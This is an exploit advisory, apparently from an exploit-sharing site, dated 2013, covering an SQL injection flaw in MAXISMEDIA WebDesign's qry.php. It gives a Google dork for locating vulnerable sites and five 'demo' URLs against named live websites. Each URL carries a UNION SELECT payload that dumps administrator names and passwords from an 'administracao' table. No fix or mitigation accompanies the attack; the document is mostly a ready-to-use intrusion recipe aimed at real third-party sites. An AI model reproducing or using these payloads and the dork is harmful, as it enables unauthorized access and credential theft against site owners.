facebook facebook twitter rss

MAXISMEDIA WebDesign SQL Injection Vulnerability

Author: TUNISIAN CYBER , Published: 05-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: MAXISMEDIA WebDesign SQL Injection Vulnerability
[+] Date: 05-12-2013
[+] Category: WebApp
[+] Google Dork: intext:"MAXISMEDIA" qry.php?id=
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################


proof:
127.0.01/[path]/qry.php?id=

Demos:
http://bebedourosecia.com.br/qry.php?id=12+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.maxisbox.com.br/esplanada/esplanada/qry.php?id=2+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.societygauchao.com.br/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.fanfarra.com.br/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.bhvideo.com.br/2010/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--


########################################################################################
Greets to: XmaxTn, XtechSet, N43iL Hack3e
########################################################################################

Like us on Facebook :